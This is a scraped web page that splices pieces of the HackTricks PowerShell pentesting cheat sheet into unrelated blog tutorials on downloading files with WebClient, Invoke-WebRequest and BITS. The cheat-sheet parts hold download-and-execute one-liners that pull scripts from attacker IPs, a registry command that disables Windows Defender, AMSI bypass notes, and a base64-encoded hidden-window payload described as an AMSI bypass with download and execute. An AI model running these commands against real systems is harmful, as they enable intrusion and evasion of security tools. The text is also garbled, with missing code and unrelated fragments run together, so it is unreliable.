Basic PS commands to start
#List everything loaded
#List everything containing "process"
#Get full helpabout a topic
#CREATE A CREDENTIAL OBJECT
Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
# Check Port or Single IP
# Check Port List in Single IP
# Check Port Range in single IP
# Check Port List in IP Lists - 80,443,445,8080
# Open SSH to the world
'SSH (Port 22)'
# Get name, proto, local and rremote ports, remote address, penable,profile and direction
When downloading files in PowerShell, using .NET’s WebClient is way faster than using Invoke-WebRequest.
Recently, downloading a 1.5GB file using Invoke-WebRequest took about 20 minutes. For the same file, download takes about 1 minute when using the WebClient.
I ran that on an t3.medium EC2 instance. As for the PowerShell version, the snippet below is the version I’m using:
1 2 3 4 5 6 7 | # output |
How does the command look like for WebClient?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | # what to download and from where |
And for Invoke-WebRequest?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | # what to download and from where# where to save it to |
Why is Invoke-WebRequest so slow? Let me know when you find out.
Apparently, with Invoke-Webrequest,
the HTTP response stream is buffered into memory, and once the file has been fully loaded- then only it will be flushed to disk. https://learn.microsoft.com/en-us/answers/questions/1036880/invoke-webrequest-downloads-a-few-kb-and-stops
Other notable places where WebClient is used:
This post is licensed under CC BY 4.0 by the author.
# Check status
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
# Check exclusions configured via GPO
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
amsi.dll is loaded into your process, and has the necessary exports for any application interact with. And because it’s loaded into the memory space of a process you control, you can change its behaviour by overwriting instructions in memory. Making it not detect anything.
Therefore, the goal of the AMSI bypasses you will are to overwrite the instructions of that DLL in memory to make the detection useless.
AMSI bypass generator web page: https://amsi.fail/
# A Method
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
# Another Method
# AMSI Bypass in python
# Testing for Amsi Bypass:
AMSI Bypass 2 – Managed API Call Hooking
Check this post for detailed info and the code. Introduction:
This new technique relies upon API call hooking of .NET methods. As it turns out, .NET Methods need to get compiled down to native machine instructions in memory which end up looking very similar to native methods. These compiled methods can hooked to change the control flow of a program.
The steps performing API cal hooking of .NET methods are:
Identify the target method to hook
Define a method with the same function prototype as the target
Use reflection to find the methods
Ensure each method has been compiled
Find the location of each method in memory
Overwrite the target method with instructions pointing to our malicious method
AMSI Bypass 3 – SeDebug Privilege
AMSI Bypass – More Resources
PowerShell, built on the .NET Framework, can take advantage of .NET classes directly within your scripts. This article provides a comprehensive guide for IT professionals on how to leverage .NET capabilities within PowerShell.
Understanding the PowerShell and .NET relationship
PowerShell is built on .NET, which means that you can directly leverage .NET classes and their static methods in your PowerShell scripts. This direct integration expands PowerShell’s capabilities, making it more powerful and flexible.
Accessing .NET classes
# Create a WebClient object
$webClient = New-Object System.Net.WebClient
# Use the WebClient to download a file
$webClient.DownloadFile("http://example.com/file.txt", "C:\temp\file.txt")Working with static methods
# Call the GetTempPath static method
$tempPath = [System.IO.Path]::GetTempPath()Handling .NET exceptions in PowerShell
try {
# Code that may throw an exception
$content = Get-Content -Path "C:\NonExistentFile.txt"
}
catch {
# Handle the exception
Write-Output "An error occurred: $_"
}
finally {
# Cleanup code
Write-Output "End of script"
}Using .NET libraries
PowerShell can also use .NET libraries (DLLs). You can load a DLL into your PowerShell session with the Add-Type cmdlet:
# Load a DLL
Add-Type -Path "C:\path\to\your\library.dll"
# Use a class from the DLL
$myObject = New-Object YourNamespace.YourClassBest practices
Here are some best practices for using .NET in PowerShell:
- Use native PowerShell cmdlets where possible: PowerShell cmdlets are often easier to read and write than equivalent .NET code. Use .NET code in PowerShell when necessary, but prefer cmdlets where possible.
- Understand object types: Understanding the types of objects you are working with will make your scripts easier to write and debug. Use the
GetType()method to find out an object’s type. - Catch exceptions: Use Try/Catch blocks to handle exceptions and prevent your script from crashing when an error occurs.
Conclusion
PowerShell’s integration with .NET allows for powerful and flexible scripting. By understanding how to use .NET within PowerShell, you can create scripts that take full advantage of the features offered by both platforms.
Reader Interactions
Add-Type -Assembly System.Windows.Forms
[System.Windows.Forms.Application]::EnableVisualStyles()
$form = [System.Windows.Forms.Form]@{
Size = '500, 150'
FormBorderStyle = 'Fixed3d'
}
$btn = [System.Windows.Forms.Button]@{
Name = 'MyButton'
Text = 'Click Me!'
Size = '90, 30'
Location = '370, 70'
Anchor = 'Bottom, Right'
}
$btn.Add_Click({
# disable the button here to allow a single download at a time
$this.Enabled = $false
# hardcoded link here for demo
$downloader.DownloadFileAsync('https://www.7-zip.org/a/7z2301-x64.exe', "$pwd\7Zip.exe")
})
$progress = [System.Windows.Forms.ProgressBar]@{
Name = 'MyProgressBar'
Size = '460, 40'
Location = '10, 10'
}
$form.Controls.AddRange(($btn, $progress))
# create a WebClient instance
$downloader = [System.Net.WebClient]::new()
# create a new runspace where the Download Events will execute
# this new runspace will have the PSHost hooked so that things like
# `Write-Host`, `Out-Host`, `Write-Warning`, etc. goes straight to the console
# its easier for troubleshooting but not mandatory
$rs = [runspacefactory]::CreateRunspace($Host)
$rs.Open()
# add the `$form` instance to the runspace scope
$rs.SessionStateProxy.PSVariable.Set([psvariable]::new('form', $form))
# the code that will initiate the events in the new runspace
$ps = [powershell]::Create().AddScript({
$registerObjectEventSplat = @{
InputObject = $args[0] # $args[0] = $downloader
EventName = 'DownloadProgressChanged'
SourceIdentifier = 'WebMainDownloadProgressChanged'
Action = {
$progress = $form.Controls.Find('MyProgressBar', $false)[0]
# for demo, in addition to increment the progress bar,
# show the percentage to the console
$eventArgs.ProgressPercentage | Out-Host
# increment the progress bar
$progress.Value = $eventArgs.ProgressPercentage
}
}
Register-ObjectEvent @registerObjectEventSplat
$registerObjectEventSplat['EventName'] = 'DownloadFileCompleted'
$registerObjectEventSplat['SourceIdentifier'] = 'WebMainDownloadFileCompleted'
$registerObjectEventSplat['Action'] = {
[System.Threading.Monitor]::Enter($form)
# when the download is completed, enable the button
$form.Controls.Find('MyButton', $false)[0].Enabled = $true
# and show this to the console
Write-Host 'Download Completed!'
[System.Threading.Monitor]::Exit($form)
}
Register-ObjectEvent @registerObjectEventSplat
}).AddArgument($downloader)
$ps.Runspace = $rs
$task = $ps.BeginInvoke()
$form.ShowDialog()
A very common requirement is that you will get to download a file from a URL in PowerShell. In this PowerShell tutorial, we’ll explore different methods to download files from URLs using PowerShell, providing examples and complete scripts for each method.
To download a file from a URL in PowerShell, you can use the Invoke-WebRequest cmdlet with its -Uri parameter for the file’s URL and -OutFile parameter for the destination path. For instance:
Invoke-WebRequest -Uri "https://powershellfaqs.com/wp-content/uploads/2024/02/TestFile.zip" -OutFile "C:\Bijay\TestFile.zip"This one-liner is a simple and effective way to download files directly from the internet using PowerShell.
1. Using Invoke-WebRequest
The Invoke-WebRequest cmdlet is the most straightforward method to download files in PowerShell. It’s similar to the wget or curl commands in Unix/Linux systems and is part of the standard PowerShell cmdlets.
Here’s an example of how to use Invoke-WebRequest to download a file using PowerShell:
# Define the URL and the destination path
$url = "https://powershellfaqs.com/wp-content/uploads/2024/02/TestFile.zip"
$destination = "C:\Bijay\TestFile.zip"
# Use Invoke-WebRequest to download the file
Invoke-WebRequest -Uri $url -OutFile $destinationThis script sets the URL of the file you want to download and the local path where you want to save it, then uses Invoke-WebRequest to download the file from the URL to the specified destination.
You can see the output in the screenshot below after I executed the PowerShell script using Visual Studio code.
2. Using Start-BitsTransfer
Another method to download files in PowerShell is using the Start-BitsTransfer cmdlet. This cmdlet is part of the BITS (Background Intelligent Transfer Service), which is more robust and suitable for network transfers. It’s especially useful for large files or when you need more control over the transfer process.
Here’s how you can use Start-BitsTransfer to download a file in PowerShell:
# Define the source URL and the destination path
$source = "https://powershellfaqs.com/largefile.iso"
$destination = "C:\Bijay\largefile.iso"
# Use Start-BitsTransfer to download the file
Start-BitsTransfer -Source $source -Destination $destinationThis script works similarly to the previous example, but it uses Start-BitsTransfer for the download, which can handle network interruptions and resume downloads.
3. Using New-Object System.Net.WebClient
For those who prefer a more object-oriented approach, you can use the System.Net.WebClient class to download files in PowerShell. This method provides a high level of control over the download process and allows you to manipulate headers, use proxy servers, and more.
Here’s an example using System.Net.WebClient in PowerShell.
# Create a new WebClient object
$webClient = New-Object System.Net.WebClient
# Define the URL and the destination file
$url = "https://powershellfaqs.com/document.pdf"
$destination = "C:\Bijay\document.pdf"
# Download the file
$webClient.DownloadFile($url, $destination)This script creates a WebClient object, sets the URL and destination, and then downloads the file with the DownloadFile method.
4. Handling Secure Connections (HTTPS)
When you’re downloading files from secure connections (HTTPS), you might encounter issues with SSL/TLS certificates. To handle this, you can adjust the ServicePointManager settings in PowerShell to bypass the certificate check:
# Ignore SSL/TLS certificate errors (use with caution)
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
# Now proceed with the download using any of the methods above
# Create a new WebClient object
$webClient = New-Object System.Net.WebClient
# Define the URL and the destination file
$url = "https://powershellfaqs.com/document.pdf"
$destination = "C:\Bijay\document.pdf"
# Download the file
$webClient.DownloadFile($url, $destination)Remember that bypassing SSL/TLS checks can expose you to security risks, such as man-in-the-middle attacks. Use this approach only when you’re certain of the source’s safety and integrity.
Conclusion
Downloading files from a URL is a common task that PowerShell makes easy. You can use Invoke-WebRequest, Start-BitsTransfer, or System.Net.WebClient in PowerShell to download a file from a URL in PowerShell.
In this PowerShell tutorial, I have explained how to download file from URL in PowerShell using various methods and examples.
You may also like:
Find a newer files
Options : CreationTime, CreationTimeUtc, LastAccessTime, LastAccessTimeUtc, LastWriteTime, LastWriteTimeUtc
Default PowerShell locations
Enable WinRM (Remote PS)
#This enables winrm
# Change NetWorkConnection Category to Private
Other connected drives
Converting the SDDL String into a Readable Format
PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
SystemAudit SuccessfulAccess (WriteAttributes) Everyone: SystemAudit SuccessfulAccess
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptorLearn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Download & Execute
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
#host a text record with your payload at one of your (unburned) domains and do this:
Download & Execute in background with AMSI Bypass
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=" Using b64 from linux
Password from secure string
Base64 Kali & EncodedCommand
Secure String to Plaintext
Password : 1ts
SecurePassword : System.Security.SecureString
Domain : HTBOr directly parsing form XML:
Password : 1ts
SecurePassword : System.Security.SecureString
Domain : HTBOS version and HotFixes
#List only "Security Update" patches
